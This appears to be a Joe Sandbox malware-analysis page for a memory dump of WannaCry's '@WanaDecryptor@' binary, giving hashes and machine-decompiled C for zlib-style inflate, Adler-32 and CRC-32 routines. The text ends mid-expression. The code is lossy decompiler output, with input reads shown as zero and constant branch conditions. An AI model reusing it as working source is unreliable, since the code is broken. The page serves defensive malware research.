0x00410675
0x0041067a
0x00000000
0x00410680
0x00410685
0x00410687
0x0041068a
0x0041068d
0x00410694
0x0041069e
0x004106a3
0x004106a4
0x004106a6
0x004106a9
0x00000000
0x004106a9
0x00000000
0x00000000
0x004106af
0x004106af
0x004106b4
0x0041072e
0x00410734
0x004106b6
0x004106bd
0x004106c0
0x004106c3
0x004106cf
0x004106d1
0x004106d6
0x004106d7
0x004106d9
0x004106e4
0x00410844
0x00000000
0x004106ea
0x004106ea
0x004106f0
0x004106f7
0x004106fa
0x00000000
0x004106fa
0x004106e4
0x00000000
0x00000000
0x0041084d
0x0041084d
0x00410853
0x00000000
0x00000000
0x00410857
0x0041085d
0x00000000
0x00000000
0x004106fd
0x004106fd
0x00410700
0x00410702
0x004104ad
0x004104a2
0x00000000
0x00410475
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ba8141ea2280d0230f62837d297c6f142902cf6410748b00ceee70376d87497
Instruction ID: d75a74fb3a0dfdb81fbbcc262e1caa4e3a0368247a27923ffbf4d457c3a86cdc
Opcode Fuzzy Hash: 5ba8141ea2280d0230f62837d297c6f142902cf6410748b00ceee70376d87497
Instruction Fuzzy Hash: E4E105B5600A018FD334CF19D490A62FBF2EF89310B25C96ED4AACB761D775E886CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040FBC0 Relevance: .4, Instructions: 359
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E0040FBC0() {
				signed int _t153;
				unsigned int _t155;
				unsigned int _t161;
				signed char _t173;
				signed int _t176;
				intOrPtr _t177;
				signed int _t178;
				signed char _t180;
				signed int _t181;
				intOrPtr _t182;
				intOrPtr _t193;
				signed int _t200;
				intOrPtr _t201;
				signed int _t204;
				signed int _t212;
				signed int _t219;
				signed int _t235;
				signed int _t240;
				void* _t241;
				void* _t242;
				void* _t243;
				intOrPtr* _t249;
				signed int _t252;
				signed int _t261;
				signed int _t267;
				unsigned int _t270;
				unsigned int _t273;
				char* _t279;
				char* _t280;
				char* _t281;
				char* _t282;
				char* _t283;
				intOrPtr _t284;
				intOrPtr _t285;
				void* _t286;
				intOrPtr* _t287;
				signed int _t289;
				intOrPtr _t290;
				void* _t291;
				intOrPtr* _t295;
				intOrPtr* _t297;
				intOrPtr* _t299;
				intOrPtr* _t301;
				signed int _t305;
				signed int _t309;
				intOrPtr* _t313;
				intOrPtr _t317;
				void* _t320;
				intOrPtr _t321;
				signed int _t323;
				intOrPtr _t325;
				intOrPtr _t326;
				signed int _t327;
				void* _t328;
				void* _t330;
				void* _t331;

				_t153 =  *(_t331 + 0x2c);
				_t204 =  *(_t331 + 0x28);
				_t316 =  *_t153;
				_t270 =  *(_t204 + 0x20);
				_t284 =  *((intOrPtr*)(_t204 + 0x30));
				_t279 =  *((intOrPtr*)(_t204 + 0x34));
				 *((intOrPtr*)(_t331 + 0x10)) =  *((intOrPtr*)(_t153 + 4));
				_t155 =  *(_t204 + 0x1c);
				 *((intOrPtr*)(_t331 + 0x18)) = _t316;
				if(_t279 >= _t284) {
					 *((intOrPtr*)(_t331 + 0x14)) =  *((intOrPtr*)(_t204 + 0x2c)) - _t279;
				} else {
					 *((intOrPtr*)(_t331 + 0x14)) = _t284 - _t279 - 1;
				}
				 *(_t331 + 0x1c) =  *(0x41a260 +  *(_t331 + 0x28) * 4);
				 *(_t331 + 0x20) =  *(0x41a260 +  *(_t331 + 0x2c) * 4);
				L4:
				while(1) {
					if(_t155 < 0x14) {
						do {
							 *((intOrPtr*)(_t331 + 0x10)) =  *((intOrPtr*)(_t331 + 0x10)) - 1;
							_t289 = 0 << _t155;
							_t155 = _t155 + 8;
							_t270 = _t270 | _t289;
							_t316 = _t316 + 1;
						} while (_t155 < 0x14);
						 *((intOrPtr*)(_t331 + 0x18)) = _t316;
					}
					_t285 =  *((intOrPtr*)(_t331 + 0x30));
					_t212 =  *(_t331 + 0x1c) & _t270;
					_t173 =  *((intOrPtr*)(_t285 + _t212 * 8));
					_t286 = _t285 + _t212 * 8;
					if(0 == 0) {
						L35:
						_t270 = _t270 >>  *(_t286 + 1);
						_t155 = _t155;
						 *_t279 =  *((intOrPtr*)(_t286 + 4));
						_t279 = _t279 + 1;
						 *((intOrPtr*)(_t331 + 0x14)) =  *((intOrPtr*)(_t331 + 0x14)) - 1;
						goto L36;
					} else {
						_t270 = _t270 >>  *(_t286 + 1);
						_t155 = _t155;
						 *(_t331 + 0x28) = 0;
						if((_t173 & 0x00000010) != 0) {
							L12:
							_t178 = _t173 & 0x0000000f;
							_t161 = _t155 - _t178;
							 *(_t331 + 0x2c) = ( *(0x41a260 + _t178 * 4) & _t270) +  *((intOrPtr*)(_t286 + 4));
							_t273 = _t270 >> _t178;
							if(_t161 < 0xf) {
								do {
									 *((intOrPtr*)(_t331 + 0x10)) =  *((intOrPtr*)(_t331 + 0x10)) - 1;
									_t309 = 0 << _t161;
									_t161 = _t161 + 8;
									_t273 = _t273 | _t309;
									_t316 = _t316 + 1;
								} while (_t161 < 0xf);
								 *((intOrPtr*)(_t331 + 0x18)) = _t316;
							}
							_t290 =  *((intOrPtr*)(_t331 + 0x34));
							_t235 =  *(_t331 + 0x20) & _t273;
							_t180 =  *((intOrPtr*)(_t290 + _t235 * 8));
							_t291 = _t290 + _t235 * 8;
							_t270 = _t273 >>  *(_t291 + 1);
							_t155 = _t161;
							 *(_t331 + 0x28) = 0;
							if((_t180 & 0x00000010) != 0) {
								L18:
								_t181 = _t180 & 0x0000000f;
								while(_t155 < _t181) {
									 *((intOrPtr*)(_t331 + 0x10)) =  *((intOrPtr*)(_t331 + 0x10)) - 1;
									_t323 = 0 << _t155;
									_t155 = _t155 + 8;
									_t270 = _t270 | _t323;
									_t316 =  *((intOrPtr*)(_t331 + 0x18)) + 1;
									 *((intOrPtr*)(_t331 + 0x18)) =  *((intOrPtr*)(_t331 + 0x18)) + 1;
								}
								_t320 = ( *(0x41a260 + _t181 * 4) & _t270) +  *((intOrPtr*)(_t291 + 4));
								_t270 = _t270 >> _t181;
								_t240 =  *(_t331 + 0x2c);
								_t155 = _t155 - _t181;
								 *((intOrPtr*)(_t331 + 0x14)) =  *((intOrPtr*)(_t331 + 0x14)) - _t240;
								_t295 = _t279 - _t320;
								_t321 =  *((intOrPtr*)(_t331 + 0x38));
								_t182 =  *((intOrPtr*)(_t321 + 0x28));
								if(_t295 >= _t182) {
									 *_t279 =  *_t295;
									_t280 = _t279 + 1;
									 *_t280 =  *((intOrPtr*)(_t295 + 1));
									_t281 = _t280 + 1;
									_t297 = _t295 + 2;
									_t241 = _t240 - 2;
									do {
										 *_t281 =  *_t297;
										_t281 = _t281 + 1;
										_t297 = _t297 + 1;
										_t241 = _t241 - 1;
									} while (_t241 != 0);
									_t316 =  *((intOrPtr*)(_t331 + 0x18));
								} else {
									_t327 =  *(_t321 + 0x2c);
									 *(_t331 + 0x28) = _t327;
									_t328 = _t327 - _t182;
									do {
										_t295 = _t295 + _t328;
									} while (_t295 < _t182);
									_t330 =  *(_t331 + 0x28) - _t295;
									if(_t240 <= _t330) {
										 *_t279 =  *_t295;
										_t282 = _t279 + 1;
										 *_t282 =  *((intOrPtr*)(_t295 + 1));
										_t283 = _t282 + 1;
										_t299 = _t295 + 2;
										_t242 = _t240 - 2;
										do {
											 *_t283 =  *_t299;
											_t283 = _t283 + 1;
											_t299 = _t299 + 1;
											_t242 = _t242 - 1;
										} while (_t242 != 0);
										_t316 =  *((intOrPtr*)(_t331 + 0x18));
									} else {
										_t243 = _t240 - _t330;
										do {
											 *_t279 =  *_t295;
											_t279 = _t279 + 1;
											_t295 = _t295 + 1;
											_t330 = _t330 - 1;
										} while (_t330 != 0);
										_t301 =  *((intOrPtr*)( *((intOrPtr*)(_t331 + 0x38)) + 0x28));
										do {
											 *_t279 =  *_t301;
											_t279 = _t279 + 1;
											_t301 = _t301 + 1;
											_t243 = _t243 - 1;
										} while (_t243 != 0);
										_t316 =  *((intOrPtr*)(_t331 + 0x18));
									}
								}
								L36:
								if( *((intOrPtr*)(_t331 + 0x14)) < 0x102 ||  *((intOrPtr*)(_t331 + 0x10)) < 0xa) {
									_t287 =  *((intOrPtr*)(_t331 + 0x3c));
									_t219 =  *((intOrPtr*)(_t287 + 4)) -  *((intOrPtr*)(_t331 + 0x10));
									_t176 = _t155 >> 3;
									if(_t176 < _t219) {
										_t219 = _t176;
									}
									_t177 =  *((intOrPtr*)(_t331 + 0x38));
									_t317 = _t316 - _t219;
									 *(_t177 + 0x20) = _t270;
									 *((intOrPtr*)(_t177 + 0x1c)) = _t155 - _t219 * 8;
									 *((intOrPtr*)(_t287 + 4)) = _t219 +  *((intOrPtr*)(_t331 + 0x10));
									 *_t287 = _t317;
									 *((intOrPtr*)(_t287 + 8)) =  *((intOrPtr*)(_t287 + 8)) + _t317 -  *_t287;
									 *((intOrPtr*)(_t177 + 0x34)) = _t279;
									return 0;
								} else {
									continue;
								}
							} else {
								while((_t180 & 0x00000040) == 0) {
									_t252 = ( *(0x41a260 + _t180 * 4) & _t270) +  *((intOrPtr*)(_t291 + 4));
									_t180 =  *((intOrPtr*)(_t291 + _t252 * 8));
									_t291 = _t291 + _t252 * 8;
									_t270 = _t270 >>  *(_t291 + 1);
									_t155 = _t155;
									 *(_t331 + 0x28) = 0;
									if((_t180 & 0x00000010) == 0) {
										continue;
									} else {
										goto L18;
									}
									goto L51;
								}
								_t249 =  *((intOrPtr*)(_t331 + 0x3c));
								 *(_t249 + 0x18) = "invalid distance code";
								 *(_t331 + 0x2c) =  *((intOrPtr*)(_t249 + 4)) -  *((intOrPtr*)(_t331 + 0x10));
								_t305 = _t155 >> 3;
								if(_t305 >=  *(_t331 + 0x2c)) {
									goto L49;
								}
								goto L50;
							}
						} else {
							while((_t173 & 0x00000040) == 0) {
								_t267 = ( *(0x41a260 + _t173 * 4) & _t270) +  *((intOrPtr*)(_t286 + 4));
								_t173 =  *((intOrPtr*)(_t286 + _t267 * 8));
								_t286 = _t286 + _t267 * 8;
								if(0 == 0) {
									goto L35;
								} else {
									_t270 = _t270 >>  *(_t286 + 1);
									_t155 = _t155;
									 *(_t331 + 0x28) = 0;
									if((_t173 & 0x00000010) == 0) {
										continue;
									} else {
										goto L12;
									}
								}
								goto L51;
							}
							if((_t173 & 0x00000020) == 0) {
								_t249 =  *((intOrPtr*)(_t331 + 0x3c));
								 *(_t249 + 0x18) = "invalid literal/length code";
								 *(_t331 + 0x2c) =  *((intOrPtr*)(_t249 + 4)) -  *((intOrPtr*)(_t331 + 0x10));
								_t305 = _t155 >> 3;
								if(_t305 >=  *(_t331 + 0x2c)) {
									L49:
									_t305 =  *(_t331 + 0x2c);
								}
								L50:
								_t193 =  *((intOrPtr*)(_t331 + 0x38));
								_t325 = _t316 - _t305;
								 *(_t193 + 0x20) = _t270;
								 *((intOrPtr*)(_t193 + 0x1c)) = _t155 - _t305 * 8;
								 *((intOrPtr*)(_t249 + 4)) = _t305 +  *((intOrPtr*)(_t331 + 0x10));
								 *_t249 = _t325;
								 *((intOrPtr*)(_t249 + 8)) =  *((intOrPtr*)(_t249 + 8)) + _t325 -  *_t249;
								 *((intOrPtr*)(_t193 + 0x34)) = _t281;
								return 0xfffffffd;
							} else {
								_t313 =  *((intOrPtr*)(_t331 + 0x3c));
								_t261 =  *((intOrPtr*)(_t313 + 4)) -  *((intOrPtr*)(_t331 + 0x10));
								_t200 = _t155 >> 3;
								if(_t200 < _t261) {
									_t261 = _t200;
								}
								_t201 =  *((intOrPtr*)(_t331 + 0x38));
								_t326 = _t316 - _t261;
								 *(_t201 + 0x20) = _t270;
								 *((intOrPtr*)(_t201 + 0x1c)) = _t155 - _t261 * 8;
								 *((intOrPtr*)(_t313 + 4)) = _t261 +  *((intOrPtr*)(_t331 + 0x10));
								 *_t313 = _t326;
								 *((intOrPtr*)(_t313 + 8)) =  *((intOrPtr*)(_t313 + 8)) + _t326 -  *_t313;
								 *((intOrPtr*)(_t201 + 0x34)) = _t281;
								return 1;
							}
						}
					}
					L51:
				}
			}

0x0040fbc3
0x0040fbc7
0x0040fbcd
0x0040fbd2
0x0040fbd6
0x0040fbda
0x0040fbdd
0x0040fbe1
0x0040fbe6
0x0040fbea
0x0040fbfa
0x0040fbec
0x0040fbef
0x0040fbef
0x0040fc09
0x0040fc18
0x00000000
0x0040fc1c
0x0040fc1f
0x0040fc21
0x0040fc26
0x0040fc33
0x0040fc35
0x0040fc38
0x0040fc3a
0x0040fc3b
0x0040fc40
0x0040fc40
0x0040fc48
0x0040fc4c
0x0040fc50
0x0040fc53
0x0040fc58
0x0040fe15
0x0040fe1a
0x0040fe1c
0x0040fe21
0x0040fe27
0x0040fe29
0x00000000
0x0040fc5e
0x0040fc63
0x0040fc65
0x0040fc67
0x0040fc6e
0x0040fca9
0x0040fca9
0x0040fcac
0x0040fcba
0x0040fcc0
0x0040fcc5
0x0040fcc7
0x0040fccc
0x0040fcd9
0x0040fcdb
0x0040fcde
0x0040fce0
0x0040fce1
0x0040fce6
0x0040fce6
0x0040fcee
0x0040fcf2
0x0040fcf6
0x0040fcf9
0x0040fd01
0x0040fd03
0x0040fd05
0x0040fd0c
0x0040fd3f
0x0040fd3f
0x0040fd44
0x0040fd4b
0x0040fd58
0x0040fd5a
0x0040fd5d
0x0040fd63
0x0040fd66
0x0040fd66
0x0040fd7c
0x0040fd80
0x0040fd82
0x0040fd86
0x0040fd8a
0x0040fd90
0x0040fd92
0x0040fd96
0x0040fd9b
0x0040fdf8
0x0040fdfd
0x0040fdff
0x0040fe01
0x0040fe02
0x0040fe03
0x0040fe06
0x0040fe08
0x0040fe0a
0x0040fe0b
0x0040fe0c
0x0040fe0c
0x0040fe0f
0x0040fd9d
0x0040fd9d
0x0040fda0
0x0040fda4
0x0040fda6
0x0040fda6
0x0040fda8
0x0040fdb0
0x0040fdb4
0x0040fdd9
0x0040fdde
0x0040fde0
0x0040fde2
0x0040fde3
0x0040fde4
0x0040fde7
0x0040fde9
0x0040fdeb
0x0040fdec
0x0040fded
0x0040fded
0x0040fdf0
0x0040fdb6
0x0040fdb6
0x0040fdb8
0x0040fdba
0x0040fdbc
0x0040fdbd
0x0040fdbe
0x0040fdbe
0x0040fdc5
0x0040fdc8
0x0040fdca
0x0040fdcc
0x0040fdcd
0x0040fdce
0x0040fdce
0x0040fdd1
0x0040fdd1
0x0040fdb4
0x0040fe2d
0x0040fe35
0x0040fe71
0x0040fe7c
0x0040fe80
0x0040fe85
0x0040fe87
0x0040fe87
0x0040fe89
0x0040fe8d
0x0040fe8f
0x0040fe9b
0x0040fea9
0x0040feae
0x0040feb4
0x0040feb7
0x0040fec3
0x0040fe3e
0x00000000
0x0040fe3e
0x0040fd0e
0x0040fd0e
0x0040fd23
0x0040fd27
0x0040fd2a
0x0040fd32
0x0040fd34
0x0040fd36
0x0040fd3d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040fd3d
0x0040fe43
0x0040fe4e
0x0040fe57
0x0040fe61
0x0040fe66
0x00000000
0x0040fe6c
0x00000000
0x0040fe66
0x0040fc70
0x0040fc70
0x0040fc85
0x0040fc89
0x0040fc8c
0x0040fc91
0x00000000
0x0040fc97
0x0040fc9c
0x0040fc9e
0x0040fca0
0x0040fca7
0x00000000
0x00000000
0x00000000
0x00000000
0x0040fca7
0x00000000
0x0040fc91
0x0040fec7
0x0040ff1f
0x0040ff2a
0x0040ff33
0x0040ff3d
0x0040ff42
0x0040ff44
0x0040ff44
0x0040ff44
0x0040ff48
0x0040ff48
0x0040ff4c
0x0040ff4e
0x0040ff5c
0x0040ff68
0x0040ff6f
0x0040ff73
0x0040ff76
0x0040ff85
0x0040fec9
0x0040fec9
0x0040fed4
0x0040fed8
0x0040fedd
0x0040fedf
0x0040fedf
0x0040fee1
0x0040fee5
0x0040fee7
0x0040fef3
0x0040ff01
0x0040ff06
0x0040ff0c
0x0040ff0f
0x0040ff1e
0x0040ff1e
0x0040fec7
0x0040fc6e
0x00000000
0x0040fc58

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6486e9592c2cb46b2c7999eca97cef0babd6418c513dfe1291d56d14bfb9792
Instruction ID: 2ca3a7e0973b0a9ded1865a7ec8cc067e044c270efaf411a13bb96b1b7e56096
Opcode Fuzzy Hash: d6486e9592c2cb46b2c7999eca97cef0babd6418c513dfe1291d56d14bfb9792
Instruction Fuzzy Hash: DDD1B73560C3418FC718CF2CD59016ABBE1EB99310F19497EE9DAA3756C734E819CB89

Uniqueness

Uniqueness Score: -1.00%

Function 00410180 Relevance: .1, Instructions: 127
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00410180() {
				unsigned int _t28;
				unsigned int _t35;
				signed int _t38;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				signed int _t46;
				signed int _t47;
				signed int _t48;
				signed int _t49;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				signed int _t53;
				signed int _t54;
				unsigned int _t96;
				signed int _t97;
				unsigned int _t114;
				signed int _t117;
				void* _t119;

				_t114 =  *(_t119 + 0xc);
				_t96 =  *(_t119 + 0xc);
				_t38 = _t96 & 0x0000ffff;
				_t97 = _t96 >> 0x10;
				if(_t114 != 0) {
					_t35 =  *(_t119 + 0x18);
					if(_t35 > 0) {
						do {
							_t28 = _t35;
							if(_t35 >= 0x15b0) {
								_t28 = 0x15b0;
							}
							_t35 = _t35 - _t28;
							if(_t28 >= 0x10) {
								_t117 = _t28 >> 4;
								_t28 = _t28 + ( ~_t117 << 4);
								do {
									_t114 = _t114 + 0x10;
									_t40 = _t38;
									_t41 = _t40;
									_t42 = _t41;
									_t43 = _t42;
									_t44 = _t43;
									_t45 = _t44;
									_t46 = _t45;
									_t47 = _t46;
									_t48 = _t47;
									_t49 = _t48;
									_t50 = _t49;
									_t51 = _t50;
									_t52 = _t51;
									_t53 = _t52;
									_t54 = _t53;
									_t38 = _t54;
									_t97 = _t97 + _t40 + _t41 + _t42 + _t43 + _t44 + _t45 + _t46 + _t47 + _t48 + _t49 + _t50 + _t51 + _t52 + _t53 + _t54 + _t38;
									_t117 = _t117 - 1;
								} while (_t117 != 0);
							}
							if(_t28 != 0) {
								do {
									_t38 = _t38;
									_t114 = _t114 + 1;
									_t97 = _t97 + _t38;
									_t28 = _t28 - 1;
								} while (_t28 != 0);
							}
							_t38 = _t38 % 0xfff1;
							_t97 = _t97 % 0xfff1;
						} while (_t35 > 0);
					}
					return _t97 << 0x00000010 | _t38;
				} else {
					return 1;
				}
			}

0x00410181
0x00410186
0x0041018c
0x00410192
0x00410197
0x004101a2
0x004101a8
0x004101af
0x004101b5
0x004101b7
0x004101b9
0x004101b9
0x004101be
0x004101c3
0x004101cb
0x004101d5
0x004101d7
0x004101db
0x004101de
0x004101e7
0x004101f0
0x004101f9
0x00410202
0x0041020b
0x00410214
0x0041021d
0x00410226
0x0041022f
0x00410238
0x00410241
0x0041024a
0x00410253
0x0041025c
0x00410265
0x00410267
0x00410269
0x00410269
0x004101d7
0x00410272
0x00410274
0x00410278
0x0041027a
0x0041027b
0x0041027d
0x0041027d
0x00410274
0x00410292
0x0041029a
0x0041029a
0x004102a2
0x004102ad
0x0041019a
0x004101a0
0x004101a0

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b4f27dd10139f30faea009d98bf7d04ad43b169fe1efa635cf320682f8d45aa
Instruction ID: 6bb151cab00cdc0290d3db98aa961ff277c67549bb944e7b7c7e1e2eea59e94c
Opcode Fuzzy Hash: 0b4f27dd10139f30faea009d98bf7d04ad43b169fe1efa635cf320682f8d45aa
Instruction Fuzzy Hash: A1314D3374558203F71DCA2F8CA12FAEAD34FD522872DD57E99C987356ECFA48564104

Uniqueness

Uniqueness Score: -1.00%

Function 0040FF90 Relevance: .1, Instructions: 109
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040FF90(signed int _a4, intOrPtr _a8, unsigned int _a12) {
				signed int _t29;
				intOrPtr _t76;
				unsigned int _t115;
				unsigned int _t118;

				_t76 = _a8;
				if(_t76 != 0) {
					_t118 = _a12;
					_t29 =  !_a4;
					if(_t118 >= 8) {
						_t115 = _t118 >> 3;
						do {
							_t118 = _t118 - 8;
							_t29 = ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 